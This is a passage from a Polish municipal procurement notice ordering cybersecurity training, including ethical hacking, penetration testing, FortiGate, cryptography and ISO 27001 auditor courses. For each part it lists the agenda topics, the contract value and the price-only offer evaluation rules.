C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	Część 3:<br/>Specjalistyczne i certyfikowane szkolenie z etycznego hackingu pozwalające na poznanie metod hakowania od strony hakera „Ethical Hacker v13” w wersji Elite dla ASI w Urzędzie Gminy:<br/>a)	czas trwania szkolenia: minimum 5 dni (min 40 godzin),<br/>b)	minimalnie wymagana agenda szkolenia:<br/>	wprowadzenie do etycznego hakingu,<br/>	zbieranie informacji o ataku,<br/>	skanowanie sieci,<br/>	Enumeracja,<br/>	analiza podatności,<br/>	hackowanie systemu,<br/>	złośliwe oprogramowanie,<br/>	monitorowanie i przechwytywanie danych,<br/>	inżynieria społeczna – socjotechniki,<br/>	ataki DDoS,<br/>	przejęcie/przechwytywanie sesji,<br/>	omijanie IDS, zapór Firewall i Honeypots,<br/>	hakowanie serwerów sieciowych,<br/>	hakowanie aplikacji internetowych,<br/>	ataki przez zapytania w SQL,<br/>	hakowanie sieci bezprzewodowych,<br/>	hakowanie mobilnych platform,<br/>	hakowanie Internetu Rzeczy,<br/>	bezpieczeństwo chmury,<br/>	kryptografia <br/><br/>c)	liczba osób: 1,<br/>d)	język szkolenia: Polski,<br/>e)	wykonawca wystawi imienny certyfikat po odbyciu szkolenia,<br/>f)	forma szkolenia: zdalna;<br/><br/>W cenie zawarty voucher na egzamin CEH, oraz certyfikat ukończenia akredytowanego szkolenia Certified Ethical Hacke.<br/><br/>Szkolenie przeprowadzone będzie przez wykwalifikowanych i posiadających stosowną wiedzę ekspertów oraz min. 2 letnie doświadczenie w danym zakresie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8326,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4)	Zadanie 4:<br/>Akredytowane szkolenie Certified Penetration Testing Professional:<br/>a)	czas trwania szkolenia: minimum 3 dni (24 godziny ),<br/>b)	zakres tematyki:<br/>	wprowadzenie do testów penetracyjnych,<br/>	zakres testów penetracyjnych,<br/>	open Source Intelligence (OSINT),<br/>	testy penetracyjne – inżynieria społeczna,<br/>	testy penetracyjne sieci – zewnętrzne,<br/>	testy penetracyjne sieci – wewnętrzne,<br/>	testy penetracyjne sieci – urządzenia obwodowe,<br/>	testy penetracyjne aplikacji internetowych,<br/>	testy penetracyjne – sieć bezprzewodowa,<br/>	testy penetracyjne IoT,<br/>	testy penetracyjne OT/SCADA,<br/>	testy penetracyjne – chmura,<br/>	analiza binarna,<br/>	pisanie raportów i działania po testach;<br/>c)	liczba osób: 1,<br/>d)	język szkolenia: Polski;<br/><br/>Wykonawca wystawi imienny certyfikat po odbyciu szkolenia.<br/>Forma szkolenia: zdalna.<br/>W cenie zawarty voucher na egzamin CPENT, oraz certyfikat ukończenia akredytowanego szkolenia Certified Penetration Testing Professional.<br/><br/>Szkolenie przeprowadzone będzie przez wykwalifikowanych i posiadających stosowną wiedzę ekspertów oraz min. 2 letnie doświadczenie w danym zakresie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 7300,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5)	Zadanie 5<br/>Kurs Fortigate zaawansowana konfiguracja urządzenia:<br/>a)	Szkolenie ma na celu zdobycie umiejętności praktycznych pozwalających na wykorzystanie zaawansowanych funkcjonalności urządzeń z rodziny FortiGate. Szczególny nacisk położony jest na integrację urządzeń z domeną AD, zaawansowane opcje routingu oraz zagadnienia związane z redundancją łącz;<br/>b)	Czas trwania szkolenia: minimum 2 dni (12 godzin);<br/>c)	Liczba osób: 1;<br/>d)	Wykonawca (trener) musi posiadać minimum certyfikat NSE7;<br/>e)	Wykonawca dostarczy zamawiającemu jednostkę UTM Foritgate w celu odbycia warsztatów;<br/>f)	Wykonawca oprze szkolenie na minimum następującej agendzie:<br/>	konfiguracja trybów pracy urządzenia (transparentny/sniffer lub router/NAT),<br/>	zarządzanie aktualizacjami oraz backup,<br/>	budowa i optymalizacja reguł zapory sieciowej,<br/>	konfiguracja systemu wykrywania włamań (IDS/IPS),<br/>	monitorowanie wykorzystania aplikacji i blokowanie malware/ransomware,<br/>	konfiguracja modułu filtrowania stron www,<br/>	konfiguracja profili antyspam,<br/>	zarządzanie wyciekiem danych DLP,<br/>	konfiguracja wielu łączy internetowych WAN,<br/>	raportowanie i analiza zdarzeń (FortiView, FortiCloud),<br/>	zaawansowana konfiguracja wielu łącz internetowych – SD WAN,<br/>	konfiguracja połączeń tunelowych VPN,<br/>	zarządzanie dostępem zdalnym SSL- VPN w oparciu o dwustopniowe metody uwierzytelniania,<br/>	instalacja i konfiguracja aplikacji FortiClient,<br/>	zarządzanie mechanizmami routingu,<br/>	konfiguracja systemy ochrony przed atakami DDoS,<br/>	zaawansowana analiza logów i zdarzeń (FortiAnalyzer, FortiCloud),<br/>	diagnostyka i rozwiązywanie problemów.<br/><br/>Wykonawca wystawi imienny certyfikat po odbyciu szkolenia.<br/>Forma szkolenia: zdalna + warsztaty online<br/>Język szkolenia: Polski<br/><br/>Szkolenie przeprowadzone będzie przez wykwalifikowanych i posiadających stosowną wiedzę ekspertów oraz min. 2 letnie doświadczenie w danym zakresie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 5900,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 6)	Zadanie 6<br/>Fabularne szkolenie e-learningowe z cyberbezpieczeństwa:<br/>Przedmiot zamówienia obejmuje dostarczenie platformy e-learningowej dotyczącej szkoleń z zakresu cyberbezpieczeństwa online dla pracowników Urzędu Gminy, oraz jednostek podległych w liczbie 200-tu użytkowników na okres 12 miesięcy. <br/>Platforma ma dostarczyć zasoby i materiały niezbędne do zapewnienia pracownikom wartościowej wiedzy i umiejętności w zakresie ochrony przed cyberzagrożeniami. W ramach dostarczonej platformy użytkownicy muszą otrzymać dostęp do materiałów szkoleniowych oraz testów wiedzy. Administratorzy muszą mieć wgląd w postęp nauki i poziom wiedzy w całej organizacji i dla poszczególnych grup. <br/>Platforma musi zawierać m.in.: <br/>•	Materiały szkoleniowe podzielone na co najmniej 4 modułów w każdym z nich znajduje się <br/>- fabularny materiał wideo , <br/>- materiał wideo z wyjaśnieniem zagadnień poruszanych w poszczególnych odcinkach, <br/>- tekstowy materiał merytoryczny, <br/>- quiz wiedzy podsumowujący dany moduł. <br/><br/>Szkolenie ma zostać przygotowane przez ekspertów w dziedzinie cyberbezpieczeństwa, a informacje w nim zawarte muszą być aktualne, istotne i odnoszące się do realnych zagrożeń, na które użytkownik może natknąć się podczas codziennego korzystania z komputera służbowego w pracy. <br/><br/>Architektura Platformy: <br/>Platforma musi być dostępna on-line, dostępna przez całą dobę, 7 dni w tygodniu, z dowolnego urządzenia z dostępem do Internetu. <br/>Platforma ma być świadczona z centrum danych znajdującym się na terenie Unii Europejskiej. Dostawca platformy musi zapewnić całkowite usunięcie danych użytkowników po zakończeniu realizacji usługi.<br/><br/>Zakres tematyczny musi zawierać co najmniej:<br/>•	socjotechnikę, <br/>•	jak stworzyć bezpieczne hasło,<br/>•	bezpieczeństwo poczty e-mail,<br/>•	obrona przed phishingiem, <br/>•	sprawdzenie bezpieczeństwa strony www, <br/>•	bezpieczne korzystanie z przeglądarki i trybu &#34;incognito&#34;,<br/>•	ataki socjotechniczne z wykorzystaniem smishing,<br/>•	ataki za pośrednictwem vishingu, <br/>•	zagrożenia związane w urządzeniami mobilnymi, <br/>•	zagrożenia związane z sieciami Wi-Fi (MitM), <br/>•	zagrożenia w mediach społecznościowych, <br/>•	dobre praktyki podczas korzystania z sieci, <br/>•	prywatność, poufność i anonimowość w Internecie.<br/><br/>Testy dla pracowników: <br/>1.	Składa się z pytań i odpowiedzi jednokrotnego i wielokrotnego wyboru.<br/>2.	Do testu nie można podejść przed uprzednio nieukończonymi modułami z odtworzonymi wszystkimi materiałami wideo i pozytywnym zaliczeniu wcześniejszych testów wiedzy z poszczególnych modułów (brak dowolności w kolejności wykonywania działań w obrębie kursu).<br/>3.	Test jest identyczny dla wszystkich uczestników odbywających szkolenie.<br/>4. Ukończenie/Zaliczenie testu wpływa na postęp ukończenia modułu (brak pozytywnego zakończenia testu z poszczególnego modułu powinien uniemożliwiać przejście do kolejnego etapu szkolenia).<br/>5.	Test należy ukończyć w określonym limicie czasowym.<br/>6. Kurs zawiera test sprawdzający wiedzę z całego szkolenia zakończony wydaniem certyfikatu. Brak zaliczenia testu wiedzy uniemożliwia zakończenie szkolenia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 37425,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7)	Zadanie 7<br/>Szkolenie kryptografii w systemach komputerowych:<br/>Agenda szkolenia ma przygotować na:<br/>	poznanie i praktyczne wykorzystanie różnorodnych technik kryptograficznych, które używane są przy implementacji zabezpieczeń w systemach komputerowych,<br/>	poznanie prawidłowych zasad użycia między innymi algorytmów szyfrujących (symetrycznych i asymetrycznych), funkcji skrótu, kodów uwierzytelniających wiadomość, algorytmów podpisu cyfrowego oraz wybranych protokołów kryptograficznych,<br/>	umiejętne unikanie typowych ataków na systemy wykorzystujące techniki kryptograficzne,<br/>	zrozumienie problemów związanych z zarządzaniem kluczami kryptograficznymi oraz przechowywaniem i przekazywaniem danych poufnych dzięki wielu praktycznym przykładom i warsztatom,<br/>	samodzielne zastosowanie poznanych mechanizmów do konfiguracji i uruchomienia centrum certyfikacji, zabezpieczonej poczty elektronicznej oraz komunikacji klient-serwer.<br/><br/>Liczba osób: 1<br/>Język szkolenia: Polski<br/>Wykonawca wystawi imienny certyfikat po odbyciu szkolenia.<br/>Forma szkolenia: zdalna.<br/>Czas trwania szkolenia: minimum 2 dni.<br/><br/>Szkolenie przeprowadzone będzie przez wykwalifikowanych i posiadających stosowną wiedzę ekspertów oraz min. 2 letnie doświadczenie w danym zakresie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3410,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>Lp.	kryterium	waga<br/>1	Cena (C)	100 %<br/><br/>2.	Cena (C) – waga kryterium 100%, maks. 100 pkt;<br/>3.	Za najkorzystniejszą ofertę zostanie wybrana oferta z największą liczbą punktów. <br/><br/>4.	Sposób oceny ofert w poszczególnych kryteriach:<br/>Cena (C)<br/>cena najniższa brutto*<br/>C =------------------------------------------------x 100 pkt <br/>cena oferty ocenianej brutto<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>•	Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>•	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>5.	Sposób obliczenia punktacji:<br/> P = C<br/>gdzie:<br/><br/>P – łączna liczba punktów<br/>C – liczba punktów w kryterium „Cena”<br/><br/>6.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów (P).<br/>7.	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>8.	Maksymalna liczba punktów do zdobycia wynosi 100,00.<br/>9.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>10.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 8)	Zadanie 8<br/>Szkolenie akredytowane na Audytora Wiodącego Systemu Zarządzania Bezpieczeństwem Informacji wg PN-EN ISO/IEC 27001:2022:<br/>Zakres szkolenia:<br/>	poznanie zasad funkcjonowania Systemu Zarządzania Bezpieczeństwem Informacji opartego na ISO / IEC 27001,<br/>	zrozumienie korelacji między ISO / IEC 27001, ISO / IEC 27002 i innymi standardami oraz normami prawnymi,<br/>	rola audytora: planowanie, przeprowadzanie i monitorowanie audytu systemu zarządzania zgodnie z ISO 27001,<br/>	jak prowadzić audyt oraz zarządzać zespołem ds. audytu,<br/>	jak interpretować wymagania ISO / IEC 27001 w kontekście audytu ISMS,<br/>	zdobycie kompetencji audytora, aby móc: zaplanować audyt, przeprowadzić audyt, przygotować projekty sprawozdań i kontynuować audyt zgodnie z ISO 27001.<br/><br/>Minimalny czas szkolenia: 24 godziny (3 dni).<br/>Voucher na egzamin ISO/IEC 27001 Lead Auditor zawarty jest w cenie szkolenia.<br/>Liczba osób: 1<br/>Język szkolenia: Polski<br/>Wykonawca wystawi imienny certyfikat po odbyciu szkolenia.<br/>Forma szkolenia: zdalna.<br/><br/>Szkolenie przeprowadzone będzie przez wykwalifikowanych i posiadających stosowną wiedzę ekspertów oraz min. 2 letnie doświadczenie w danym zakresie. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3977,25 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <p class="mb-0">73431000-2 - Testy i ocena sprzętu bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje 